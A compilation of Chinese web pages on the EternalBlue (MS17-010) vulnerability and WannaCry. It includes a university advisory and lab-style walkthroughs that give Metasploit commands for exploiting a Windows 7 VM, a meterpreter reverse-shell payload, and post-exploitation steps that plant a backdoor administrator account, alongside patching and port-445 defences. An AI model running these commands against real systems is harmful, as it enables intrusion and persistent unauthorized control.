本文介绍了永恒之蓝的基本概念和攻击方法,以及建议用户采取什么措施来防止自己受到攻击。永恒之蓝是一种利用微软Windows系统漏洞的攻击工具,被黑客广泛使用。文章描述了永恒之蓝的操作过程,并提醒读者应该定期更新操作系统和安全软件,严格保护密码等敏感信息,以避免受到网络攻击的威胁。 可刑又可拷!永恒之蓝漏洞原理及复现 hack0919的博客 04-24 3853 2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒 永恒之蓝全过程复现 Zhaokangkang123的博客 02-09 4580 超详细永恒之蓝复现教程 MS1710永恒之蓝漏洞利用 07-07 MS1710永恒之蓝漏洞利用 永恒之蓝(ms17010)漏洞检测工具 04-19 在司徒西大神易语言ms17010漏洞检测源码上稍做修改,并做成了批处理,可以单机也可以网段批量检测永恒之蓝漏洞。优点是体积小,扫描准确。缺点是扫描速度较慢。 使用方法: 此程序为易语言开发,如被误报病毒,可以将文件从隔离区恢复,添加信任。 下载后假设文件解压放在D盘 运行方式: 一、直接打开ms17010目录,运行“点我运行.bat”。如果运行报错 “The system cannot write to the specified device”,用以下方式运行。 二、 1.1 Win键+R键,打开运行,输入:cmd 2.1 在终端输入:cd /d d:\ms17010 3.1 测试本机:ms17010pc.exe 127.0.0.1 测试远程单机:ms17010pc.exe 目的IP (注意命令和IP之间有个空格) 3.2 网段批量测试:ms17010.exe 目的网段 例如:ms17010.exe 192.168.188.0/24 (注意命令和IP之间有个空格) 永恒之蓝实验工具.rar 07-19 最原始的利用版本 永恒之蓝ms17_010方程式漏洞利用工具.rar 12-03 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.***.*** LPORT=4**** -f dll > x64.dll,reverse或者bind方式,替换到目录下,执行第一个检测安装backdoor,第二个选项卡attack就可以了。方式可以直接打靶机,可以上传到跳板机执行。 永恒之蓝漏洞检测工具 10-10 永恒之蓝漏洞检测工具,用于扫描网络环境是否存在MS17-010漏洞。打开工具后输入ip或者ip网段(如:要检测172.16.21.1-172.16.21.254网段的设备就在里面输入:172.16.21.1/24)就可以检测设备是否有MS17-010漏洞,及时更新,以免勒索病毒入侵。 永恒之蓝漏洞扫描工具官方版 08-06 可以批量扫描局域网内存在永恒之蓝漏洞的工具,比某安工具强大N倍 如何防范永恒之蓝漏洞 07-27 永恒之蓝漏洞(EternalBlue)是一种影响微软Windows操作系统的漏洞,它被用于进行网络蠕虫攻击和远程代码执行。以下是一些防范永恒之蓝漏洞的建议措施: 1. 及时打补丁:安装并定期更新微软发布的安全补丁,包括修复永恒之蓝漏洞的相关补丁。确保操作系统和其他软件都是最新版本,以修复已知漏洞。 2. 使用防火墙:配置网络防火墙以限制对服务器和内部网络的访问,并阻止恶意流量进入网络。防火墙可以过滤掉可能包含永恒之蓝攻击代码的流量。 3. 强化访问控制:使用强密码策略,限制远程访问,禁用不必要的服务和端口,实施多因素身份验证等,以减少攻击者利用永恒之蓝漏洞进行远程攻击的可能性。 4. 网络隔离:将关键系统和敏感数据放置在独立的网络段中,并使用网络隔离技术(如虚拟局域网/VLAN)分隔网络,以减少受到攻击的风险。 5. 安全监控:使用入侵检测系统(IDS)和入侵防御系统(IPS)来监控网络流量,并检测和阻止潜在的永恒之蓝攻击行为。 6. 应用白名单和黑名单:限制可执行文件的运行,只允许运行经过授权的可信程序,以防止恶意软件利用永恒之蓝漏洞进行远程执行。 7. 安全培训和意识:对服务器管理员和用户进行安全培训,提高其对网络安全风险和最佳实践的认识。 综合采取这些措施可以帮助减少永恒之蓝漏洞对系统的威胁。然而,没有绝对安全的系统,持续的安全更新和监控仍然非常重要。 “相关推荐”对你有帮助么? 非常没帮助 没帮助 一般 有帮助 非常有帮助 提交 想走安全的小白 CSDN认证博客专家 CSDN认证企业博客 码龄6年 暂无认证 71 原创 3万+ 周排名 165万+ 总排名 50万+ 访问 等级 3659 积分 528 粉丝 521 获赞 86 评论 2798 收藏 私信 关注 热门文章 Linux下配置DNS服务 92711 永恒之蓝漏洞利用及攻击 89553 渗透测试技术----工具使用(二)--Nessus工具下载及使用(安装在Kali上) 63140 Linux防火墙配置 30643 TCP三次握手和四次挥手详解(面试常见问题) 28078 分类专栏 笔记 1篇 计算机相关知识 2篇 web前端 3篇 网络安全 7篇 python 2篇 WINDOWS环境搭建 5篇 漏洞原理及攻击 2篇 PHP 3篇 Linux环境配置 16篇 黑客攻击 2篇 数据库 3篇 渗透测试技术 28篇 渗透测试工具 5篇 DVWA web漏洞介绍 8篇 漏洞复现 3篇 最新评论 渗透测试技术----工具使用(二)--Nessus工具下载及使用(安装在Kali上) 超了这个世界: 不对是8834我不小心打错了,打不开,但是我的8834端口是打开的 渗透测试技术----工具使用(二)--Nessus工具下载及使用(安装在Kali上) 超了这个世界: 老师,我的https://kail的ip:8848/#/的网页打不开 常见系统故障修复(二)——修复GRUB引导故障 饭饭饭饭饭~: 将光盘放在第一位 的前提是 你得有这个设备吧?!! 渗透测试技术----工具使用(二)--Nessus工具下载及使用(安装在Kali上) qq_29149437: 如果想扫描单一软件的网络安全可以吗 永恒之蓝漏洞利用及攻击 call me袋鼠哥: 我也是欸,防火墙全关了 您愿意向朋友推荐“博客详情页”吗? 强烈不推荐 不推荐 一般般 推荐 强烈推荐 提交 最新文章 停更说明 漏洞复现----ThinkCMF框架任意内容包含漏洞分析复现 渗透测试技术----工具使用(四)--SQLMap使用方法 2020年1篇 2019年65篇 2018年5篇 目录 目录 分类专栏 笔记 1篇 计算机相关知识 2篇 web前端 3篇 网络安全 7篇 python 2篇 WINDOWS环境搭建 5篇 漏洞原理及攻击 2篇 PHP 3篇 Linux环境配置 16篇 黑客攻击 2篇 数据库 3篇 渗透测试技术 28篇 渗透测试工具 5篇 DVWA web漏洞介绍 8篇 漏洞复现 3篇 目录 评论 12 被折叠的 条评论 为什么被折叠? 到【灌水乐园】发言 查看更多评论 添加红包 祝福语 请填写红包祝福语或标题 红包数量 个 红包个数最小为10个 红包总金额 元 红包金额最低5元 余额支付 当前余额3.43元 前往充值 > 需支付:10.00元 取消 确定 下一步 知道了 成就一亿技术人! 领取后你会自动成为博主和红包主的粉丝 规则 hope_wisdom 发出的红包 实付元 使用余额支付 点击重新获取 扫码支付 钱包余额 0 抵扣说明: 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。 余额充值 求科普,什么是永恒之蓝?可怕在哪里? - 知乎首页知乎知学堂发现等你来答切换模式登录/注册网络安全信息安全求科普,什么是永恒之蓝?可怕在哪里?勒索病毒的那个永恒之蓝为什么很可怕?关注者11被浏览62,750关注问题写回答邀请回答好问题添加评论分享4 个回答默认排序高质量打工人 关注永恒之蓝2017年4月14日晚黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具其中包含“永恒之蓝”工具“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限5月12日不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒英国、俄罗斯、整个欧洲以及中国国内多个高校校内网大型企业内网和政府机构专网中招被勒索支付高额赎金才能解密恢复文件编辑于 2021-11-25 15:37赞同 4添加评论分享收藏喜欢收起yaolingyu爱好编程,爱好诗词,喜欢摆烂 关注一.介绍。1.什么是永恒之蓝。永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。2.SMB协议介绍。SMB(ServerMessage Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。SMB 是在会话层(session layer)和表示层(presentation layer)以及小部分应用层(application layer)的协议。SMB使用了NetBIOS的应用程序接口 (Application Program Interface,简称API),一般端口使用为139,445。3.SMB会话生命阶段。1) SMB协议协商(Negotiate)在一个SMB还没有开始的时候,由客户端率先发出一个协商请求。在请求中,客户端会列出所有它所支持协议版本以及所支持的一些特性(比如加密Encryption、持久句柄Persistent Handle、客户端缓存Leasing等等)。而服务端在回复中则会指定一个SMB版本且列出客户端与服务端共同支持的特性。2)建立SMB会话(Session Setup)客户端选择一个服务端支持的协议来进行用户认证,可以选择的认证协议一般包括NTLM、Kerberos等。按照选择的认证协议的不同,这个阶段可能会进行一次或多次SESSION_SETOP请求/回复的网络包交换。3)连接一个文件分享(Tree Connect)在会话建立之后,客户端会发出连接文件分享的请求。源于文件系统的树形结构,该请求被命名为树连接(Tree Connect)。以SMB协议的阿里云NAS为例,一般的SMB挂载命令为:net use z: \\XXX.nas.aliyuncs.com\myshare其中的“ \\http://XXX.nas.aliyuncs.com\myshare”便是我们将要连接的那个文件分享,也便是那棵“树”。如果在“myshare”中创建有子目录“abc”,那直接连接“abc”这棵子树也是可以的:net use z: \\XXX.nas.aliyuncs.com\myshare\abc4) 文件系统操作在文件分享连接成功之后,用户通过SMB客户端进行真正的对于目标文件分享的业务操作。这个阶段可以用到的指令有CREATE、CLOSE、FLUSH、READ、WRITE、SETINFO、GETINFO等等。5)断开文件分享连接(Tree Disconnect)当一个SMB会话被闲置一定时间之后,Windows会自动断开文件分享连接并随后中止SMB会话。这个闲置时间可以通过Windows注册表进行设定。当然,用户也可以主动发起断开连接请求。6)终止SMB会话(Logoff)当客户端发出会话中止请求并得到服务端发回的中止成功的回复之后,这个SMB会话至此便正式结束了。二.实验环境。1.环境介绍。攻击机:kali:ip:192.168.248.128靶机:windows7专业版:ip:192.168.248.1302.工具介绍。Metasploit:Metasploit框架(简称MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编 写的模板化框架,具有很好的扩展性,便于渗透测试人员开发,使用定制的工具模板。该工具有六个模块,分别为辅助模块(auxiliary)、渗透攻击模块(exploits)、后渗透攻击模块(post)、攻击载荷模块(payloads)、空指令模块(nops)、编码器模块(encoders),其中msf为总模块,其他均为分支模块。此工具集成在kali中。其中auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块,exploit/windows/smb/ms17_010_eternalblue是永恒之蓝攻击代码,一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。三.实验步骤。1.确定连通用kali中ping命令测试。 2.查看靶机开放端口。nmap -r 192.168.248.130 确定端口开放。3.进入msf。1)使用auxiliary模块。use auxiliary/scanner/smb/smb_ms17_010 2)查看需要配置的信息show options 3)设置攻击目标及端口set rhosts 192.168.248.130 set rport 445 经测试后发现存在漏洞。4)使用exploit/windows/smb/ms17_010_eternalblue进行攻击。use exploit/windows/smb/ms17_010_eternalblue 至此漏洞利用结束。四.永恒之蓝防护。1)禁用SMB协议2)打开Windows Update,或手动安装补丁3)使用防火墙阻止445端口的连接,或者使用进/出站规则阻止445端口的连接4)不要随意打开陌生的文件4)安装杀毒软件,及时更新病毒库发布于 2023-03-09 22:33赞同 1添加评论分享收藏喜欢收起 关于新型勒索病毒“永恒之蓝”的紧急应对措施-四川大学网络空间安全学院 英文站| 学院概况 学院简介 学院领导 组织机构 联系我们 最新动态 新闻动态 通知公告 人才培养 研究生培养 本科生教学 科学研究 科研动态 学生工作 工作动态 学生团委 师资队伍 全体教师 招生就业 本科生招生 研究生招生 博士生导师 硕士生导师 就业信息 党务人事 党建工作 人事工作 学术交流 学术看板 下载中心 教育教学 科学研究 学生工作 网络安全少年生
最新动态 新闻动态 通知公告 当前位置: 首页
>
最新动态
>
新闻动态
>
正文
关于新型勒索病毒“永恒之蓝”的紧急应对措施 日期:2017-05-13
来源:本站
作者: 关注:次 【事件概述】 北京时间2017年5月12日晚,全球爆发大规模勒索软件感染事件,一个名为“永恒之蓝”的蠕虫勒索病毒波及近100个国家,包括英国、美国、中国、俄罗斯、西班牙和意大利,约7.5万台计算机被感染。国内多个高校校内网、大型企业内网和政府机构专网中招,危害目前仍在持续快速扩大。该病毒会加密电脑和服务器中几乎所有类型的文件,被加密的文件后缀名被统一修改为“.WNCRY”,感染者只有缴纳高额赎金(有的要比特币)才能解密资料和数据。 图1勒索软件界面 【软件名称】 WannaCrypt、WannaCry、WanaCrypt0r、WCrypt、WCRY 【利用原理】 其迅速感染全球大量主机的原因是利用了基于445端口传播扩散的SMB漏洞MS17-101,微软在今年3月份发布了该漏洞的补丁。2017年4月14日黑客组织Shadow Brokers(影子经纪人)公布的Equation Group(方程式组织)使用的“网络军火”中包含了该漏洞的利用程序,而该勒索软件的攻击者或攻击组织在借鉴了该“网络军火”后进行了这次全球性的大规模攻击事件。 【影响范围】 图2全球445端口开放状况分布 图3全球勒索病毒感染状况分布 【软件分析】 该软件扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。当系统被该勒索软件入侵后,系统中.doc, .docx, .xls, .xlsx等近180种类型的文件会被加密,后缀名被统一修改为“.WNCRY”。 此次大面积感染是通过蠕虫来部署,蠕虫病毒是一种常见的计算机病毒,它利用网络传播自身功能的拷贝或自身的某些部分到其他的计算机系统中,因此一切与被感染主机有网络连接的设备都将被感染。因此,此次蠕虫危害,受影响的是主要是具有内网环境的企业、校园及公共事业等组织机构。受感染的内网中的重要文件和数据已经被加密,已经严重影响了企业、校园及公共事业等组织机构的正常业务执行,并已产生巨大的数据泄露和信息损害。 早在今年4月19日,方程式组织工具包被再次被公开,其中包含了多个Windows漏洞利用工具,影响多个Windows操作系统。漏洞针对Windows服务器的25、88、139、445、3389等端口漏洞远程执行命令,其中影响尤为严重的是445和3389端口。相应Windows漏洞及补丁信息如图所示: 由于部分组织机构未意识到漏洞的巨大危害,未能采取有效地防护措施,被黑客利用漏洞进行攻击,并且在其内网批量感染勒索病毒。 勒索病毒被漏洞远程执行后,会从资源文件夹下释放一个压缩包,此压缩包会在内存中通过密码:WNcry@2ol7解密并释放文件,并隐藏自身。病毒加密详情: (1)使用AES-128-CBC模型对数据进行加密(加密代码是自实现) (2)AES密钥是由CSPRNG产生的 (3)AES密钥由RSA-2048密钥进行加密(实现为Windows RSA代码) 目前无法对加密后的文件进行解密。 【漏洞检测】 微软提供免费查扫工具:http://www.microsoft.com/security/scanner/,下载双击运行即可。 360“NSA武器库免疫工具”:http://dl.360safe.com/nsa/nsatool.exe,检测系统是否存在漏洞,并关闭受到漏洞影响的端口。 【修复方案】 临时修复:关闭445端口,关闭网络共享(具体操作见文末) 建议修复:微软已发布补丁MS17-010修复了“永恒之蓝”攻击的系统漏洞,打开系统自动更新,检测更新并安装,重启电脑。为计算机安装最新的安全补丁,或者手动下载安装 https://technet.microsoft.com/zh-cn/library/security/MS17-010;对于Windows XP、2003等机器,除尽快升级到window 7/Windows外,也可下载微软总部刚发布的XP和部分服务器版WindowsServer2003特别安全补丁 https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/。 其他方式:360企业安全天擎团队开发的系统免疫工具,程序在电脑上运行以后,现有蠕虫将不会感染系统。下载地址:https://eyun.360.cn/surl_yZ3RsYgQuvu(提取码:e2ab) 附具体操作方法: 一、启用Windows防火墙并关闭445端口 方法一:下载一键禁用445端口脚本 点击www.secboot.com/445.zip,下载解压 右键点击“管理员身份运行”即可 方法二: (1)打开控制面板,点击系统和安全 (2)打开Windows防火墙 (3)点击“打开或关闭Windows防火墙” (4)启用Windows防火墙,点击“确定” (5)点击“高级设置” (6)点击右侧的“新建规则” (7)创建“端口”规则,点击“下一步” (8)在特定本地端口输入“445”,点击“下一步” (9)选择“阻止连接”,点击“下一步” (10)全选,点击“下一步” (11)任意输入名称,点击“完成”,即可关闭445端口。 二、关闭网络文件共享 (1)打开“控制面板”,点击“网络和Internet” (2)点击“网络和共享中心” (3)点击“更改高级共享设置” (4)选择“关闭文件和打印机共享”,点击“保存修改” 四川大学网络空间安全学院 四川大学信息安全研究所 2017年5月12日 【关闭】 友情链接 | 网站地图 | 帮助中心 | 2019版权所有©四川大学网络空间安全学院江安校区:成都市双流区川大路四川大学 多学科交叉研究创新大楼 邮编:610207 电话:86-028-85998668望江校区:成都市一环路南一段24号望江校区东三教5楼 邮编:610065 电话:86-028-85998668 WannaCry(永恒之蓝)勒索病毒 - 知乎切换模式写文章登录/注册WannaCry(永恒之蓝)勒索病毒聚云社官网www.juyuninfo.com巴菲特在股东大会上说过这样一句话:“我对大规模杀伤武器是很悲观的,但我认为发生核战争的可能性要低于生化武器与网络攻击。”谁也没有料到,巴菲特的这句话言犹在耳,一种名为“WannaCry”的网络病毒就在一夜之间席卷全球,酿成了不小的灾祸。“勒索病毒”席卷全球3年前一种名为WannaCry(永恒之蓝)的电脑勒索病毒正在全球蔓延,99个国家受到病毒感染。最严重的地区集中在美国、欧洲、澳洲等地区,在无需用户任何操作的情况下,Wcry2.0即可扫描开放445文件共享端口的Windows机器,从而植入恶意程序。目前,病毒已经扩散至全球上百个国家。在这样规模的攻击下,中国也未能幸免,12日当晚,中国多所大学也已经遭受到了这种病毒的袭击,大量学生中招,许多人通过微博分享了自己学校机房等大面积中毒的照片。此次校园网勒索病毒是由NSA(美国国家安全局)泄漏的“永恒之蓝”黑客武器传播的。“永恒之蓝”可远程攻击Windows的445端口(文件共享),如果系统没有安装今年3月的微软补丁,无需用户任何操作,只要开机上网,“永恒之蓝”就能在电脑里执行任意代码,植入勒索病毒等恶意程序,和之前的病毒还需要用户下载和运行有很大不同。“你有张良计,我有过墙梯”面对WannaCry网络病毒在国内的攻击愈演愈烈,一场反击战也迅速打响。5 月 13 日下午,微软决定对已经停止支持的 Windows XP 和 Windows 2003 发布特别补丁,以修复勒索病毒“永恒之蓝”所利用的漏洞。根据微软官方的描述,这一次恶意软件所利用的漏洞其实早在今年 3 月就被修复了,然而因为 XP、Windows Server 2003 等系统早已停止技术支持,所以未获得补丁更新。但是由于本次影响实在过于严重,经过评估决定特例提供补丁。国家互联网应急中心随后发布勒索软件情况通报,详细说明了病毒软件的情况和应急处置措施,并附上了防病毒补丁地址。IDC之势,安全之路对于企业来说,越来越需要把安全,尤其是数据安全,纳入业务发展的基础环节。选择一家可靠的数据中心,是未来企业保证数据安全、业务安全的基础。 企业可以从这几个维度去衡量数据中心:包括(但不限于)互联网接入能力(带宽保障、三网动态BGP等)、硬件基础设施保障(电力、空调、消防等)、故障率(单点故障、每年场地引起的IT停机)、提供商的实力等等。 企业应当让自身的安全策略更契合,与以往的“头疼医头、脚疼医脚”不同,数据中心安全防护更需要全面的部署。作为中国高标准生态数据中心与云基础服务引领者,大碗数据http://www.bowlplus.com致力于帮助完善安全服务功能,共筑健康、规范、长远发展的企业安全之路,为互联网、金融业、制造业等企业的IT设施提供稳定、安全的高负荷运行环境。发布于 2020-06-23 17:11网络安全服务器互联网数据中心(IDC)赞同 23 条评论分享喜欢收藏申请漏洞考古之永恒之蓝原理及利用 - 知乎
永恒之蓝漏洞利用及攻击-CSDN博客
>求科普,什么是永恒之蓝?可怕在哪里? - 知乎
关于新型勒索病毒“永恒之蓝”的紧急应对措施-四川大学网络空间安全学院
WannaCry(永恒之蓝)勒索病毒 - 知乎
EternalBlue【永恒之蓝】漏洞详解(复现、演示、远程、后门、入侵、防御)内容丰富-深入剖析漏洞原理-漏洞成因-以及报错解决方法-值得收藏!-腾讯云开发者社区-腾讯云
nalBlue【永恒之蓝】漏洞详解(复现、演示、远程、后门、入侵、防御)内容丰富-深入剖析漏洞原理-漏洞成因-以及报错解决方法-值得收藏!-腾讯云开发者社区-腾讯云用户8909609EternalBlue【永恒之蓝】漏洞详解(复现、演示、远程、后门、入侵、防御)内容丰富-深入剖析漏洞原理-漏洞成因-以及报错解决方法-值得收藏!关注作者腾讯云开发者社区文档建议反馈控制台首页学习活动专区工具TVP最新优惠活动文章/答案/技术大牛搜索搜索关闭发布登录/注册首页学习活动专区工具TVP最新优惠活动返回腾讯云官网用户8909609首页学习活动专区工具TVP最新优惠活动返回腾讯云官网社区首页 >专栏 >EternalBlue【永恒之蓝】漏洞详解(复现、演示、远程、后门、入侵、防御)内容丰富-深入剖析漏洞原理-漏洞成因-以及报错解决方法-值得收藏!EternalBlue【永恒之蓝】漏洞详解(复现、演示、远程、后门、入侵、防御)内容丰富-深入剖析漏洞原理-漏洞成因-以及报错解决方法-值得收藏!用户8909609关注发布于 2023-12-27 08:31:561.2K0发布于 2023-12-27 08:31:56举报文章被收录于专栏:BM CTFBM CTF漏洞背景: 1.何为永恒之蓝?
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
2.什么是SMB协议?
SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
3. SMB工作原理是什么?首先客户端发送一个SMB negport 请求数据报,,并列出它所支持的所有SMB的协议版本。服务器收到请求消息后响应请求,并列出希望使用的SMB协议版本。如果没有可以使用的协议版本则返回0XFFFFH,结束通信。协议确定后,客户端进程向服务器发起一个用户或共享的认证,这个过程是通过发送SessetupX请求数据包实现的。客户端发送一对用户名和密码或一个简单密码到服务器,然后通过服务器发送一个SessetupX应答数据包来允许或拒绝本次连接。当客户端和服务器完成了磋商和认证之后,它会发送一个Tcon或TconX SMB数据报并列出它想访问的网络资源的名称,之后会发送一个TconX应答数据报以表示此次连接是否接收或拒绝。连接到相应资源后,SMB客户端就能够通过open SMB打开一个文件,通过read SMB读取文件,通过write SMB写入文件,通过close SMB关闭文件。准备工作: 虚拟机:VMware
靶机(rhost):Windows7 (IP:192.168.244.133)
攻击机(lhost):Kali (IP:192.168.244.136)
所需工具:nmap、metasploit(MSF) 【工具均在Kali系统内】漏洞复现过程:主机发现关闭防火墙和杀软 靶机关闭防火墙杀软等一切防御信息 否则nmap扫描不到
防火墙关闭路径
控制面板->系统和安全->Windows 防火墙image.png查看攻击机与靶机IP信息 查看攻击机与靶机的IP信息
攻击机:终端模拟器->ifconfig
靶机:win->cmd->ipconfig
image.pngimage.png进行Ping通测试 进行ping通测试
Kali使用CTRL+C快捷键进行终止命令进行
image.pngimage.png和上面两张图片一样结果的都表示Ping通成功复制扫描存活主机以及开放端口 使用nmap扫描工具对目标机网段进行存活主机扫描以及靶机的445端口是否开放
image.pngimage.png可以看出目标机存活并且445端口为开放状态复制入侵过程开启postgresql数据库服务 以下命令均在Kali攻击机root终端进行!
开启
service postgresql start 查看是否开启
service postgresql status
image.png此状态表示开启成功复制初始化metasploit postgresql数据库 初始化
msfdb init
image.png此状态表示初始化成功复制启动MSF框架 Kali root终端输入
msfconsole
image.png此状态表示进入MSF框架成功复制利用探测漏洞模块 db_status #查看是否进入MSF攻击服务
search ms17_010 #查找探测模块
use auxiliary/scanner/smb/smb_ms17_010 #利用探测模块
show options #查看配置参数
set rhost 192.168.244.133/32 #设置探测主机段
set threads 20 #设置探测线程
run/exploit #执行探测
image.pngimage.png探测出likely表示可能存在漏洞!复制利用永恒之蓝模块 use exploit/windows/smb/ms17_010_eternalblue #利用ms17_010永恒之蓝漏洞
set rhost 192.168.244.133 #设置攻击目标IP
set payload windows/x64/meterpreter/reverse_tcp #设置攻击载荷(木马信息)
set lhost 192.168.244.136 #设置监听主机IP
set lpost 445 #设置监听端口
run/exploit #执行攻击
image.png运行成功后会出现meterpreter>
Meterpreter俗称"黑客瑞士军刀"复制 想要深入了解可以看以下内容
Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功后的攻击载荷使用。它可以在触发漏洞后返回一个由攻击者控制的通道,以便远程执行命令。
Meterpreter的功能丰富,例如添加用户、隐藏某些内容、打开shell、获取用户密码、上传和下载远程主机的文件、运行cmd.exe、捕捉屏幕、获取远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等。此外,Meterpreter可以躲避入侵检测系统,在远程主机上隐藏自己,不改变系统硬盘中的文件,因此HIDS(基于主机的入侵检测系统)很难对它做出响应。Meterpreter还可以简化任务创建多个会话,利用这些会话进行渗透。在Metasploit Framework中,Meterpreter是一种后渗透工具,它属于一种在运行过程中可通过网络进行功能扩展的动态可扩展型Payload。这种工具是基于“内存DLL注入”理念实现的,它能够通过创建一个新进程并调用注入的DLL来让目标系统运行注入的DLL文件。其中,攻击者与目标设备中Meterpreter的通信是通过Stager套接字实现的。Meterpreter作为后渗透模块有多种类型,并且命令由核心命令和扩展库命令组成,极大的丰富了攻击方式。此外,Meterpreter还支持Ruby脚本形式的扩展。远程查看靶机信息和捕捉屏幕 sysinfo #查看靶机系统信息
getuid #查看靶机用户身份
screenshot #对靶机当前屏幕进行截图
image.png需要注意的是最后一部屏幕截图保存到了根目录下
根目录下受权限保护可能查看不了图片
解决方法有两种改权限或者复制到桌面上 在这里讲的是第二种方法复制cp EoiLSMEC.jpeg '/home/kali/桌面/flag1.png'
image.pngimage.pngimage.png进入靶机控制台shell #进入靶机cmd终端
image.png成功进入靶机C:\Windows\system32路径下复制对靶机进行后门植入 #创建新管理员用户
net user baimao 123 /add
#将baimao用户加入到本地管理员组当中
net localgroup administrators baimao /add
#查看本地管理员组当中的用户成员
net localgroup administrators
#查看此路径下的所有文件和目录
dir
image.png与图片中信息相同就代表后门植入成功
exit可以退回meterpreter路径下复制查看靶机当前用户whoami
image.png创建文件夹 mkdir baimao
image.pngimage.pngexit可以退出MSF框架复制如何防御开启防火墙 防火墙开启路径
控制面板->系统和安全->Windows 防火墙
image.pngimage.pngimage.png禁用靶机139和445端口 查看靶机445端口是否开启
netstat -ant
image.png可以看到445端口是开启状态复制 禁用靶机445端口路径
控制面板->系统和安全->Windows 防火墙
image.pngimage.pngimage.pngimage.pngimage.pngimage.pngimage.pngimage.png禁用server服务 win+r 运行
输入services.msc
image.png关闭不必要的服务 关闭服务路径
控制面板->系统和安全->Windows 防火墙
image.pngimage.png 根据需要可以选择关闭与否
注册表关闭445端口 win+r 运行
输入regedit进入注册表
找到此注册表路径
根据自己系统位数进行修改64位就选择QWORD
HKEY_LOCAL_MACHINE\System\Controlset\Services\NetBT\Parameters
image.png 重命名为SMBDeviceEnabled
image.png 右键->修改->数值数据的值为0(0代表关闭,1代表打开),点击确定,完成设置 。
image.png 重启之后查看445端口是否关闭!
可以看到445端口已经不见了!复制安装杀毒软件 360安全卫士与火绒安全软件成功阻止了永恒之蓝!
大家想要了解的,可以参考下!
360安全卫士和火绒安全软件都是知名的电脑安全软件,具有多种防护功能。
360安全卫士是一款全面而高效的电脑安全防护软件,它拥有强大的查杀能力,可以检测和清除电脑中的病毒、木马、恶意程序等安全隐患。同时,它还提供了多种实用的功能,如实时监控、木马查杀、漏洞修复等,可以帮助用户保护电脑安全,提高使用体验。
火绒安全软件则是一款以防护为主打功能的电脑安全软件,它拥有自主知识产权的新一代反病毒引擎,能够检测和分析恶意程序,提供全面的防护功能。此外,火绒安全软件还拥有钩子扫描功能,可以快速扫描指定进程,发现潜在的安全风险。
最后总结 2017年永恒之蓝漏洞,编号为ms17_010漏洞。
现在只有一些低版本的电脑没有打ms17_010的补丁,windows7 以上版本几乎都没有这个漏洞了。
虽然如此,此漏洞非常经典,现如今仍有很大的学习漏洞原理以及深入研究防御策略都有很大的借鉴和学习研究的意义。
让大家可以对网络安全更加重视,网络安全刻不容缓,让我们为国家网络安全的建设共同努力!本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。 原始发表:2023-12-26,如有侵权请联系 cloudcommunity@tencent.com 删除前往查看防火墙漏洞系统协议原理本文分享自 作者个人站点/博客 前往查看如有侵权,请联系 cloudcommunity@tencent.com 删除。本文参与 腾讯云自媒体分享计划 ,欢迎热爱写作的你一起参与!防火墙漏洞系统协议原理评论登录后参与评论0 条评论热度最新登录 后参与评论推荐阅读LV.关注文章0获赞0目录漏洞背景:准备工作:漏洞复现过程:主机发现关闭防火墙和杀软查看攻击机与靶机IP信息进行Ping通测试扫描存活主机以及开放端口入侵过程开启postgresql数据库服务初始化metasploit postgresql数据库启动MSF框架利用探测漏洞模块利用永恒之蓝模块远程查看靶机信息和捕捉屏幕进入靶机控制台对靶机进行后门植入查看靶机当前用户创建文件夹如何防御开启防火墙禁用靶机139和445端口禁用server服务关闭不必要的服务注册表关闭445端口安装杀毒软件最后总结相关产品与服务主机安全主机安全(Cloud Workload Protection,CWP)基于腾讯安全积累的海量威胁数据,利用机器学习为用户提供资产管理、木马文件查杀、黑客入侵防御、漏洞风险预警及安全基线等安全防护服务,帮助企业构建服务器安全防护体系。现支持用户非腾讯云服务器统一进行安全防护,轻松共享腾讯云端安全情报,让私有数据中心拥有云上同等级别的安全体验。产品介绍2024新春采购节领券社区专栏文章阅读清单互动问答技术沙龙技术视频团队主页腾讯云TI平台活动自媒体分享计划邀请作者入驻自荐上首页技术竞赛资源技术周刊社区标签开发者手册开发者实验室关于社区规范免责声明联系我们友情链接腾讯云开发者扫码关注腾讯云开发者领取腾讯云代金券热门产品域名注册云服务器区块链服务消息队列网络加速云数据库域名解析云存储视频直播热门推荐人脸识别腾讯会议企业云CDN加速视频通话图像分析MySQL 数据库SSL 证书语音识别更多推荐数据安全负载均衡短信文字识别云点播商标注册小程序开发网站监控数据迁移Copyright © 2013 - 2024 Tencent Cloud. All Rights Reserved. 